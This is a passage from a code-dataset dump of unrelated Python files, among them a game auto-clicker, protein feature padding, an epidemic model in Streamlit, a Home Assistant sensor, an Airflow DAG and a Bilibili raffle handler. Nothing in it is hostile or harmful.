adb.click(bInfo['result'][0], bInfo['result'][1])\n\n\n def checkTask(self):\n tryCount = 0\n cInfo = pictureFind.matchImg(adb.getScreen_std(), self.task)\n if cInfo == None:\n print('无法检测到任务交付入口,中断任务交付后续')\n return False\n else:\n while self.switch:\n adb.click(cInfo['result'][0], cInfo['result'][1])\n \n screenshot = adb.getScreen_std()\n if pictureFind.matchImg(screenshot, self.daySel) != None:\n return True\n elif pictureFind.matchImg(screenshot, self.actSel) != None:\n return True\n else:\n tryCount += 1\n if tryCount > 5:\n return False\n\n def submitTask(self):\n #交付当前栏的任务\n endCount = 0\n while self.switch:\n screenshot = adb.getScreen_std()\n #gInfo = pictureFind.matchImg(screenshot, self.get, 0.9)\n collectAllInfo = pictureFind.matchImg(screenshot, self.collectAll, 0.8)\n backInfo = pictureFind.matchImg(screenshot, self.back, 0.9)\n #rewardFinishInfo = pictureFind.matchMultiImg(screenshot, self.rewardFinish, \n # confidencevalue = adb.getTagConfidence())[0]\n #if rewardFinishInfo != None:\n # rewardFinishInfo.sort(key = lambda x:x[1])\n # if rewardFinishInfo[0][1] < 250:#该栏任务交付全部完成\n # return True\n if collectAllInfo != None: #有任务待交付\n endCount = 0\n adb.click(collectAllInfo['result'][0], collectAllInfo['result'][1])\n continue\n elif backInfo != None: #没有任务待交付\n endCount += 1\n if endCount > 3:\n return True\n else:\n continue\n else: #获取了奖励\n endCount = 0\n adb.click(720, 120)\n continue\n\n def oneByOne(self):\n #adb.screenShot()\n tryCount = 0\n self.submitTask()\n while self.switch:\n #切换到每周任务\n wInfo = pictureFind.matchImg(adb.getScreen_std(), self.weekUnSel)\n adb.click(wInfo['result'][0], wInfo['result'][1])\n wInfo = pictureFind.matchImg(adb.getScreen_std(), self.weekSel)\n if wInfo != None:\n break\n else:\n tryCount += 1\n if tryCount > 5:\n return False\n self.submitTask()\n\n\n\n def run(self, switchI):\n self.switch = switchI\n condition0 = self.goToMainpage()\n if condition0:\n condition1 = self.checkTask()\n if condition1:\n self.oneByOne()\n if self.switch and (not condition0):\n toast.broadcastMsg(\"ArkHelper\", \"任务交付出错\", self.icon)\n\n elif self.switch and (not condition1):\n toast.broadcastMsg(\"ArkHelper\", \"无需任务交付\", self.icon)\n \n elif self.switch:\n self.goToMainpage()\n toast.broadcastMsg(\"ArkHelper\", \"任务交付完成\", self.icon)\n \n self.switch = False\n\n def stop(self):\n self.switch = False","sub_path":"foo/arknight/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"2166187","text":"# encoding: utf-8\n\"\"\"\n@author: julse@qq.com\n@time: 2020/4/18 17:15\n@desc:\n\"\"\"\nimport os\nimport numpy as np\n# from keras.utils import to_categorical\n\nfrom common import check_path, handleBygroup, getPairs\n\n\nclass Feature_type:\n V_PSSM='V_PSSM'\n H_PSSM='H_PSSM'\n SEQ_1D = 'SEQ_1D'\n SEQ_1D_OH = 'SEQ_1D_OH' # onehot\n SEQ_2D = 'SEQ_2D'\nclass BaseFeature:\n def base_compose(self,dirout_feature,fin_pair,dir_feature_db,feature_type='V_PSSM',fout_pair=''):\n check_path(dirout_feature)\n fo = open(fout_pair,'w') if fout_pair!='' else None\n row = 0\n for pairs in getPairs(fin_pair):\n a = pairs[0]\n b = pairs[1]\n # print(pairs) # ['O35668', 'P00516']\n fa = os.path.join(dir_feature_db, a + '.npy')\n fb = os.path.join(dir_feature_db, b + '.npy')\n row = row + 1\n print('loading %d th feature pair'%row)\n if not (os.access(fa, os.F_OK) and os.access(fb, os.F_OK)):\n print('===============features of pairs not found %s %s================' % (a, b), os.access(fa, os.F_OK),\n os.access(fb, os.F_OK))\n continue\n pa = np.load(fa,allow_pickle=True)\n pb = np.load(fb,allow_pickle=True)\n if (len(pa)<50 or len(pa)>2000 or max(pa)>20) or (len(pb)<50 or len(pb)>2000 or max(pb)>20):\n print('wrong length or x')\n continue\n if fo!=None:\n fo.write('%s\\t%s\\n'%(a,b))\n fo.flush()\n # padding\n if feature_type == Feature_type.V_PSSM:pc = self.padding_PSSM(pa,pb,vstack=True)\n elif feature_type == Feature_type.H_PSSM:pc = self.padding_PSSM(pa,pb,vstack=False)\n elif feature_type == Feature_type.SEQ_1D:pc = self.padding_seq1D(pa,pb,vstack=False)\n # elif feature_type == Feature_type.SEQ_1D_OH:pc = self.padding_seq1D(pa,pb,vstack=False)\n elif feature_type == Feature_type.SEQ_2D:pc = self.padding_seq2D(pa,pb)\n else:\n print('incoreect feature_type')\n return\n # 保存padding后的成对特征\n fout = os.path.join(dirout_feature, \"%s_%s.npy\" % (a, b))\n np.save(fout, pc)\n del pc, pa, pb\n if fo != None:\n fo.close()\n def padding_PSSM(self,pa,pb,vstack=True,shape=(2000,21)):\n pa_pad_col = np.pad(pa, ((0, 0), (0, shape[1]-pa.shape[1])), 'constant', constant_values=(0, 1))\n pb_pad_col = np.pad(pb, ((0, 0), (0, shape[1]-pb.shape[1])), 'constant', constant_values=(0, 1))\n # 前期工作不够严谨,估计有超过两千长度的蛋白\n pa_pad_row = np.pad(pa_pad_col, ((0, shape[0] - pa.shape[0]), (0, 0)), 'constant')\n pb_pad_row = np.pad(pb_pad_col, ((0, shape[0] - pb.shape[0]), (0, 0)), 'constant')\n pc = np.vstack([pa_pad_row, pb_pad_row]) if vstack else np.hstack([pa_pad_row, pb_pad_row])\n return pc\n def padding_seq1D(self,pa,pb,vstack=True,shape=(2000,)):\n # data.shape = (4000,)\n # warring padding number not appear in origin data\n pa_pad_col = np.pad(pa, ((0, shape[0]-pa.shape[0])), 'constant', constant_values=0)\n pb_pad_col = np.pad(pb, ((0, shape[0]-pb.shape[0])), 'constant', constant_values=0)\n pc = np.vstack([pa_pad_col, pb_pad_col]) if vstack else np.hstack([pa_pad_col, pb_pad_col])\n return pc\n\n def padding_seq2D(self,pa,pb,shape=(2000*2000,21*21)):\n pa_pad_col = np.pad(pa, ((0, 2000 - pa.shape[0])), 'constant', constant_values=0)\n pb_pad_col = np.pad(pb, ((0, 2000 - pb.shape[0])), 'constant', constant_values=0)\n pc = np.zeros((2000,2000))\n lookUpTable = self.constructLookUpTable()\n for idx, x in enumerate(pa_pad_col):\n for idy, y in enumerate(pb_pad_col):\n pc[idx, idy] = lookUpTable.index(x*100+y)\n # tmp_sp_2D[i,idx,idy,0] = lookUpTable.index(x*100+y)[0] # todo\n return pc\n # support\n def constructLookUpTable(self):\n lookUpTable = [0] * 21 * 21\n aminos = [i for i in range(21)]\n cell = 0\n for i in aminos:\n for j in aminos:\n lookUpTable[cell] = i * 100 + j\n cell = cell + 1\n return lookUpTable\ndef getGroupFeature(group_dir_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D):\n src = 'pairdata'\n des = 'feature'\n func = BaseFeature().base_compose\n handleBygroup(group_dir_pair, src, des, func,dir_feature_db,feature_type=feature_type)\n # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n # group_dir_pair = '/home/jjhnenu/data/PPI/release/data/group/'\n\nif __name__ == '__main__':\n print()\n cloud = 'jjhnenu'\n\n # filename = 'positiveV1_fswissprot_Composi_5'\n # basepath = '/home/%s/data/PPI/stage2/processPair2445/pair/%s' % (cloud, filename)\n # # dir_std_pssm = '%s/PSSM/output_std_head' % basepath\n '''\n pssm\n '''\n # dir_std_pssm = '/home/jjhnenu/data/PPI/stage2/processPair2445/pair/positiveV1_fswissprot_Composi_5/PSSM/output_std_head'\n # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n # for eachfile in os.listdir(dir_pair):\n # print(eachfile)\n # finpair = os.path.join(dir_pair, eachfile)\n # dir_foutFeaturePair = '/home/%s/data/PPI/release/feature/pssm_feature_2D_vstack/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n # BaseFeature().compose_PSSM(dir_foutFeaturePair,finpair,dir_std_pssm)\n '''\n seq1D\n '''\n # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n # for eachfile in os.listdir(dir_pair):\n # print(eachfile)\n # fin_pair = os.path.join(dir_pair, eachfile)\n # dirout_feature = '/home/%s/data/PPI/release/feature/seq_feature_1D/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n # BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)\n '''\n seq1D_onehot\n just use seq1D\n '''\n\n '''\n seq2D\n too large\n '''\n # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n # for eachfile in os.listdir(dir_pair):\n # print(eachfile)\n # fin_pair = os.path.join(dir_pair, eachfile)\n # dirout_feature = '/home/%s/data/PPI/release/feature/seq_feature_2D/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n # BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_2D)\n\n '''\n pssm hstack\n '''\n # dir_feature_db = '/home/jjhnenu/data/PPI/stage2/processPair2445/pair/positiveV1_fswissprot_Composi_5/PSSM/output_std_head'\n # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n # for eachfile in os.listdir(dir_pair):\n # print(eachfile)\n # fin_pair = os.path.join(dir_pair, eachfile)\n # dirout_feature = '/home/%s/data/PPI/release/feature/pssm_feature_2D_hstack/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n # BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.H_PSSM)\n\n '''\n pssm 400 hstack\n '''\n # dir_feature_db = '/home/jjhnenu/data/PPI/stage2/processPair2445/pair/positiveV1_fswissprot_Composi_5/PSSM/output_std_400_1'\n # dir_pair = '/home/%s/data/PPI/release/data/p_fp_fw_2_1_1/'%cloud\n # for eachfile in os.listdir(dir_pair):\n # print(eachfile)\n # fin_pair = os.path.join(dir_pair, eachfile)\n # dirout_feature = '/home/%s/data/PPI/release/feature/pssm400_feature_1D/p_fp_fw_2_1_1/%s/' % (cloud,eachfile.split('.')[0])\n # BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)\n\n '''\n group seq1D\n '''\n # dir_feature_db = '/home/jjhnenu/data/PPI/release/featuredb/seq_feature_1D/'\n # group_dir_pair = '/home/jjhnenu/data/PPI/release/pairdata/group/'\n # getGroupFeature(group_dir_pair, dir_feature_db, feature_type=Feature_type.SEQ_1D)\n\n\n '''\n feature pair \n positive \n swissprot\n '''\n # dir_feature_db = '/home/19jiangjh/data/PPI/release/featuredb/seq_feature_1D/'\n # dir_pair = '/home/19jiangjh/data/PPI/release/pairdata'\n # for eachfile in ['negative_fswissprot_7177.txt','negative_fpositive_10245.txt','positive_2049.txt']:\n # print(eachfile)\n # fin_pair = os.path.join(dir_pair, eachfile)\n # dirout_feature = '/home/19jiangjh/data/PPI/release/feature/p_fp_fw'\n # BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)\n\n dir_feature_db = '/home/19jjhnenu/Data/SeqTMPPI2W/featuredb/'\n dir_pair = '/home/19jjhnenu/Data/SeqTMPPI2W/pair/p_fw_13349/0'\n for eachfile in ['negative_fswissprot_7177.txt','negative_fpositive_10245.txt','positive_2049.txt']:\n print(eachfile)\n fin_pair = os.path.join(dir_pair, eachfile)\n dirout_feature = '/home/19jiangjh/data/PPI/release/feature/p_fp_fw'\n BaseFeature().base_compose(dirout_feature,fin_pair,dir_feature_db,feature_type=Feature_type.SEQ_1D)","sub_path":"FeatureDealer.py","file_name":"FeatureDealer.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"357660249","text":"\"\"\"\nastroHOG Statistical tests\n\"\"\"\n\nimport numpy as np\n\n# ------------------------------------------------------------------------------------------------------------------------\ndef HOG_PRS(phi):\n # Calculates the projected Rayleigh statistic of the distributions of angles phi.\n #\n # INPUTS\n # phi - angles between -pi/2 and pi/2\n #\n # OUTPUTS\n # Zx - value of the projected Rayleigh statistic \n # s_Zx - \n # meanPhi -\n\n angles=phi #2.*phi\n\n Zx=np.sum(np.cos(angles))/np.sqrt(np.size(angles)/2.)\n temp=np.sum(np.cos(angles)*np.cos(angles))\n s_Zx=np.sqrt((2.*temp-Zx*Zx)/np.size(angles))\n\n Zy=np.sum(np.sin(angles))/np.sqrt(np.size(angles)/2.)\n temp=np.sum(np.sin(angles)*np.sin(angles))\n s_Zx=np.sqrt((2.*temp-Zy*Zy)/np.size(angles))\n\n meanPhi=0.5*np.arctan2(Zy, Zx)\n\n return Zx, s_Zx, meanPhi\n\n# ------------------------------------------------------------------------------------------------------------------------------\ndef HOG_AM(phi):\n # Calculate the alignment measure.\n #\n # INPUTS\n # phi - angles between -pi/2 and pi/2\n #\n # OUTPUTS\n #AM - value of the alignment measure. \n \n angles=phi\n\n ami=2.*np.cos(phi)-1.\n am=np.mean(ami)\n\n return am\n\n\n","sub_path":"statests.py","file_name":"statests.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"426384530","text":"#this will allow you to pick two items and plot them\n#options are all within parm array\n#options: z, Nf, Nx, alphaX, Mmin, avg temp\n\nfileglob = '/home/amber/data/alpha0/*'\nfileblob = '/home/amber/data/alpha1/*'\n#looks at all files within specified alpha folder\n\nfrom twentyonecmfast_tools import *\n#imports everything within directory\n \nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#load_andre_models returns 4 sets of data\n#this assigns variables to the 4 sets\np,k,d,e=load_andre_models(fileglob)\nP,K,D,E=load_andre_models(fileblob)\n#p is the parm array\n#k is the k array\n#d is the delta2 array\n#e is the delta2 error array\n\n#p has the option for plotting\n#shape of p is 83 data points for each of the 6\n#row 0 is z\n#row 1 is Nf\n#row 2 is Nx\n#row 3 is alphaX\n#row 4 is Mmin\n#row 5 is avg temp\n\n#fixed bottom axis of plot\nx=np.argsort(p[:,0])\nX=np.argsort(P[:,0])\n\n#fixed data vs other item in same order\nplt.plot(p[x,0],p[x,5], color='r', label='alpha0')\nplt.plot(P[X,0],P[X,5], color='b', label='alpha1')\n\n#customize plot\nplt.ylabel('avg temp')\nplt.xlabel('z')\nplt.title('z vs. avg temp')\nplt.legend(loc='lower right')\n\n#display plot\nplt.show()\n","sub_path":"plottwoparms.py","file_name":"plottwoparms.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"249644732","text":"import streamlit as st\r\nfrom scipy.integrate import odeint\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n#st.set_page_config(layout=\"wide\")\r\nst.set_page_config(page_title='simulatingSars',page_icon='')\r\nst.title('Modelo de Infección por SARS-CoV-2')\r\n\r\n@st.cache\r\ndef deriv(y, t, N, beta, alfaa, alfag, alfah, alfai, deltaa, deltai, gammaa, gammai, gammah, gammag, sigmah, sigmag, pe, pa, pi, ph, pg, w, mu, v, lamda, q):\r\n #Ecuaciones del cambio para solucionar\r\n S, E, A, I, H, G, R, V, FV, D = y\r\n dSdt = (-beta(t) * S * (pe*E+pa*A+pi*I+ph*H+pg*G) / N) -(v(t)*w*S) +lamda -(mu*S) #v(t)*S vacunados en tiempo t, solo vacunación sobre susceptibles es efectiva\r\n dEdt = (beta(t) * (S+FV) * (pe*E+pa*A+pi*I+ph*H+pg*G) / N) - ((deltaa+deltai+mu) * E)\r\n dAdt = deltaa*E - (gammaa+alfaa+mu)*A\r\n dIdt = deltai * E - (sigmah +sigmag+gammai+alfai+mu)*I\r\n dHdt = sigmah*I - (gammah+alfah+mu)*H*mu # el mu hace que crezca mucho\r\n dGdt = sigmag*I - (gammag+alfag+mu)*G\r\n dRdt = gammaa*A + gammai * I + gammah*H + gammag*G - mu*R\r\n dVdt = v(t)*q*w*S- mu*V #las vacunaciones tienen una componente temporal\r\n dFVdt= v(t)*(1-q)*w*S - (beta(t)/N)*FV*(pe*E+pa*A+pi*I+ph*H+pg*G) - mu*FV #comp temporal\r\n N = S+E+A+I+H+G+R+V+FV\r\n dDdt = mu * N\r\n\r\n return dSdt, dEdt, dAdt, dIdt, dHdt, dGdt, dRdt, dVdt, dFVdt, dDdt\r\n\r\n#La sidebar NO se actualiza cada vez que recarga el archivo!!!\r\nN = st.sidebar.number_input('Población Total',min_value=1_000,max_value=100_000_000,value=1_000_000,step=1_000)\r\n\r\nbeta_0 = st.sidebar.number_input('Tasa de Contacto Potencialmente Peligroso \\u03B2',min_value=0.0,max_value=1.0,value=0.7)\r\nlamda = st.sidebar.number_input('Tasa de Natalidad \\u039B',min_value=0.0,max_value=1.0,value=0.01)\r\nalfag = st.sidebar.number_input('Tasa de Mortalidad inducida por enfermedad para pacientes de UCI \\u03B1₉',min_value=0.0,max_value=1.0,value=0.01)\r\nsigmag = st.sidebar.number_input('Tasa de Ingreso a UCI \\u03C3₉',min_value=0.0,max_value=1.0,value=0.01)\r\n\r\n\r\n#Para el encerramiento:\r\n\r\ndef beta(t):\r\n return beta_0\r\n\r\nif st.sidebar.checkbox('¿Hay vacunación?'):\r\n vac = st.sidebar.number_input('Tasa de Vacunación \\u03BD',min_value=0.0,max_value=1.0, value=5*(10e-3))\r\n dia = st.sidebar.number_input('Comienzo de Vacunación (Día)',1,None,50,1)\r\n q = st.sidebar.number_input('Eficacia q',min_value=0.0,max_value=1.0,value=0.9)\r\n w = st.sidebar.number_input('Adhesión a la campaña w',min_value=0.0,max_value=1.0,value=0.6)\r\nelse:\r\n vac=0\r\n dia=0\r\n q=0\r\n w=0\r\ndef v(t):\r\n return vac if (t>=dia) else 0.0 #Tasa de vacunación\r\n#&(t 388:\r\n print(\"{} {}\".format('answer:',outline))\r\n time.sleep(1)\r\n\r\n\r\n\r\ndef main():\r\n id = input('请输入问题的url:')\r\n id = id.split('/') # 字符串切片\r\n id = id[-1] # 取倒数第一个切片\r\n list_url = get_urls(id)\r\n print_content(list_url)\r\n\r\nmain()","sub_path":"zhihu/zhihureping.py","file_name":"zhihureping.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371827317","text":"import Zero\nimport Events\nimport Property\nimport VectorMath\nimport math\n\nVector3 = VectorMath.Vec3\nQuaternion = VectorMath.Quaternion\n\nclass SedrickBody:\n def DefineProperties(self):\n self.IsRight = Property.Bool(False)\n self.IsLeft = Property.Bool(False)\n self.LeftRight = Property.Bool(False)\n \n self.Start = Property.Bool(True)\n \n self.BodyX = Property.Float(0)\n self.BodyX = Property.Float(0)\n self.BodyZ = Property.Float(0)\n\n def Initialize(self, initializer):\n Zero.Connect(self.Space, Events.LogicUpdate, self.OnLogicUpdate)\n\n def OnLogicUpdate(self, UpdateEvent):\n Parent = self.Owner.Parent\n Position = self.Owner.Transform.Translation\n \n MouseScreenPosition = Zero.Mouse.ScreenPosition\n WorldMousePosition = self.LevelSettings.CameraViewport.ScreenToWorldZPlane(MouseScreenPosition, 0)\n Distance = WorldMousePosition - self.Owner.Transform.WorldTranslation\n \n RotationAngles = Quaternion(0, 0, 0)\n \n if(self.Start is True):\n self.BodyX = Position.x\n self.BodyY = Position.y\n self.BodyZ = Position.z\n self.Start = False\n \n if(Parent.SedrickPlayerController.Side is True):\n \n self.Owner.Orientation.LookAtPoint(Vector3(WorldMousePosition.x, WorldMousePosition.y, 0))\n \n if(Parent.SedrickPlayerController.Side2 is True):\n self.Owner.Orientation.LookAtPoint(Vector3(WorldMousePosition.x, WorldMousePosition.y, 0))\n \n #print(self.Owner.Orientation.AbsoluteAngle)\n #print(self.Owner.Orientation.Rotation)\n \n if(Distance.x < 0):\n self.IsLeft = True\n self.IsRight = False\n if(self.IsLeft is True):\n if(self.LeftRight is True):\n #print(\"Right\")\n RotationAngles.y = 1\n self.Owner.Transform.Rotation = RotationAngles\n self.LeftRight = False\n \n if(Distance.x > 0):\n self.IsLeft = False\n self.IsRight = True\n if(self.IsRight is True):\n if(self.LeftRight is False):\n #print(\"Left\")\n RotationAngles.y = 0\n self.Owner.Transform.Rotation = RotationAngles\n self.LeftRight = True\n \n if(Zero.Keyboard.KeyIsDown(Zero.Keys.S) and not Zero.Keyboard.KeyIsDown(Zero.Keys.A) and not Zero.Keyboard.KeyIsDown(Zero.Keys.D)):\n self.Owner.Transform.Translation = Vector3(self.BodyX, self.BodyY - 0.09, self.BodyZ)\n Parent.BoxCollider.Offset = Vector3(0.02, 0.07, 0)\n Parent.BoxCollider.Size = Vector3(0.1, 0.3, 10)\n \n elif(Zero.Keyboard.KeyIsDown(Zero.Keys.Space) or Parent.SedrickPlayerController.OnGround is False):\n self.Owner.Transform.Translation = Vector3(self.BodyX, self.BodyY - 0.02, self.BodyZ)\n \n else:\n self.Owner.Transform.Translation = Vector3(self.BodyX, self.BodyY, self.BodyZ)\n Parent.BoxCollider.Offset = Vector3(0.02, 0.15, 0)\n Parent.BoxCollider.Size = Vector3(0.1, 0.5, 10)\n\nZero.RegisterComponent(\"SedrickBody\", SedrickBody)","sub_path":"Content/SedrickBody.py","file_name":"SedrickBody.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"555112700","text":"\"\"\"Support for MelView device sensors.\"\"\"\nimport logging\n\nfrom pymelview import DEVICE_TYPE_ATA\n\nfrom homeassistant.const import (\n DEVICE_CLASS_TEMPERATURE,\n TEMP_CELSIUS,\n STATE_ON,\n STATE_OFF\n)\nfrom homeassistant.components.binary_sensor import DEVICE_CLASS_PROBLEM\nfrom homeassistant.helpers.entity import Entity\n\nfrom . import MelViewDevice\nfrom .const import DOMAIN, MEL_DEVICES\n\nATTR_MEASUREMENT_NAME = \"measurement_name\"\nATTR_ICON = \"icon\"\nATTR_UNIT = \"unit\"\nATTR_DEVICE_CLASS = \"device_class\"\nATTR_VALUE_FN = \"value_fn\"\nATTR_ENABLED_FN = \"enabled\"\n\nATTR_STATE_DEVICE_ID = \"device_id\"\nATTR_STATE_DEVICE_LAST_SEEN = \"last_communication\"\n\nATA_SENSORS = {\n \"room_temperature\": {\n ATTR_MEASUREMENT_NAME: \"Room Temperature\",\n ATTR_ICON: \"mdi:thermometer\",\n ATTR_UNIT: TEMP_CELSIUS,\n ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,\n ATTR_VALUE_FN: lambda x: x.device.room_temperature,\n ATTR_ENABLED_FN: lambda x: True,\n },\n}\n\nATA_BINARY_SENSORS = {\n \"error_state\": {\n ATTR_MEASUREMENT_NAME: \"Error State\",\n ATTR_ICON: None,\n ATTR_UNIT: None,\n ATTR_DEVICE_CLASS: DEVICE_CLASS_PROBLEM,\n ATTR_VALUE_FN: lambda x: x.error_state,\n ATTR_ENABLED_FN: lambda x: True,\n },\n}\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_sensors(hass, entry, async_add_entities, type_binary, init_status=False):\n \"\"\"Set up MELView device sensors and bynary sensor based on config_entry.\"\"\"\n entry_config = hass.data[DOMAIN][entry.entry_id]\n ata_sensors = ATA_BINARY_SENSORS if type_binary else ATA_SENSORS\n\n mel_devices = entry_config.get(MEL_DEVICES)\n async_add_entities(\n [\n MelDeviceSensor(mel_device, measurement, definition, type_binary)\n for measurement, definition in ata_sensors.items()\n for mel_device in mel_devices[DEVICE_TYPE_ATA]\n if definition[ATTR_ENABLED_FN](mel_device)\n ],\n init_status,\n )\n\n\nasync def async_setup_entry(hass, entry, async_add_entities):\n \"\"\"Set up MELView device sensors based on config_entry.\"\"\"\n await async_setup_sensors(hass, entry, async_add_entities, False)\n\n\nclass MelDeviceSensor(Entity):\n \"\"\"Representation of a Sensor.\"\"\"\n\n def __init__(self, device: MelViewDevice, measurement, definition, isbinary):\n \"\"\"Initialize the sensor.\"\"\"\n self._api = device\n self._name_slug = device.name\n self._measurement = measurement\n self._def = definition\n self._isbinary = isbinary\n\n @property\n def unique_id(self):\n \"\"\"Return a unique ID.\"\"\"\n return f\"melview_custom_heatpump_{self._api.device.device_id}\"\n\n @property\n def icon(self):\n \"\"\"Return the icon to use in the frontend, if any.\"\"\"\n return self._def[ATTR_ICON]\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return f\"{self._name_slug} {self._def[ATTR_MEASUREMENT_NAME]}\"\n\n @property\n def is_on(self):\n \"\"\"Return the state of the binary sensor.\"\"\"\n if self._isbinary:\n return self._def[ATTR_VALUE_FN](self._api)\n\n return False\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n if self._isbinary:\n return STATE_ON if self.is_on else STATE_OFF\n\n return self._def[ATTR_VALUE_FN](self._api)\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement.\"\"\"\n return self._def[ATTR_UNIT]\n\n @property\n def device_class(self):\n \"\"\"Return device class.\"\"\"\n return self._def[ATTR_DEVICE_CLASS]\n\n async def async_update(self):\n \"\"\"Retrieve latest state.\"\"\"\n await self._api.async_update()\n\n @property\n def device_info(self):\n \"\"\"Return a device description for device registry.\"\"\"\n return self._api.device_info\n\n @property\n def state_attributes(self):\n \"\"\"Return the optional state attributes.\"\"\"\n data = {\n ATTR_STATE_DEVICE_ID: self._api.device_id,\n }\n return data\n","sub_path":"custom_components/melview_custom/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"420282816","text":"import stdio\n\nstdio.writeln('Nhap so: ')\nso_input=stdio.readInt()\n\nsodao=0\ntam=so_input\n\nwhile tam>0:\n\t\n\tsodao= sodao*10 + tam%10\n\ttam=tam//10\n\t\t\nif so_input==sodao:\n\tstdio.writeln('So %d la do doi xung' %so_input)\nelse:\n\tstdio.writeln('So %d khong phai la so doi xung' %so_input)\t","sub_path":"basic/Tuan5/Bai2.py","file_name":"Bai2.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"304562456","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime, timedelta\nfrom airflow.contrib.hooks.ssh_hook import SSHHook \nfrom airflow.operators.latest_only_operator import LatestOnlyOperator\nfrom airflow.contrib.operators.ssh_operator import SSHOperator\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2019, 10, 2),\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n # 'queue': 'bash_queue',\n # 'pool': 'backfill',\n # 'priority_weight': 10,\n # 'end_date': datetime(2016, 1, 1),\n}\n\ndag = DAG(\n 'KillerWF3-v1.0.1', \n default_args=default_args, \n schedule_interval='0 0 2 * *'\n )\n\nlatest_only = LatestOnlyOperator(\n task_id='latest_only', \n dag=dag\n )\n\ninfa_wait_WF_10_bash =\"\"\"\ncd /cygdrive/c/Users/DRECRAP/Desktop\n./WFwrapper.sh DRECRAP Wait_WF_10; echo $?\n\"\"\"\n\nop1 = SSHOperator(\n task_id=\"01_infa_wait_WF_10\",\n ssh_hook=SSHHook(ssh_conn_id='infa_ssh'),\n command=infa_wait_WF_10_bash,\n dag=dag)\n\nop2 = SSHOperator(\n task_id=\"02_infa_wait_WF_10\",\n ssh_hook=SSHHook(ssh_conn_id='infa_ssh'),\n command=infa_wait_WF_10_bash,\n dag=dag)\n\nlatest_only >> op1 >> op2","sub_path":"KillerWF3-v1.0.1.py","file_name":"KillerWF3-v1.0.1.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"23697540","text":"from bilibili import bilibili\nfrom statistics import Statistics\nfrom printer import Printer\nimport utils\nimport asyncio\nimport random\n\n\nclass Rafflehandler:\n __slots__ = ('queue_raffle',)\n instance = None\n\n def __new__(cls, *args, **kw):\n if not cls.instance:\n cls.instance = super(Rafflehandler, cls).__new__(cls, *args, **kw)\n cls.instance.queue_raffle = asyncio.Queue()\n return cls.instance\n \n async def run(self):\n while True:\n raffle = await self.queue_raffle.get()\n await asyncio.sleep(3)\n list_raffle0 = [self.queue_raffle.get_nowait() for i in range(self.queue_raffle.qsize())]\n list_raffle0.append(raffle)\n list_raffle = list(set(list_raffle0))\n \n # print('过滤完毕')\n # if len(list_raffle) != len(list_raffle0):\n # print('过滤机制起作用')\n \n tasklist = []\n for i in list_raffle:\n task = asyncio.ensure_future(i[0](*i[1]))\n tasklist.append(task)\n \n await asyncio.wait(tasklist, return_when=asyncio.ALL_COMPLETED)\n \n @staticmethod\n def Put2Queue(func, value):\n # print('welcome to appending')\n Rafflehandler.instance.queue_raffle.put_nowait((func, value))\n # print('appended')\n return\n \n @staticmethod\n def getlist():\n print('目前TV任务队列状况', Rafflehandler.instance.queue_raffle.qsize())\n \n\nasync def handle_1_TV_raffle(num, real_roomid, raffleid):\n # print('参与')\n await asyncio.sleep(random.uniform(0.5, min(30, num * 1.3)))\n json_response2 = await bilibili.get_gift_of_TV(real_roomid, raffleid)\n Printer().printlist_append(['join_lottery', 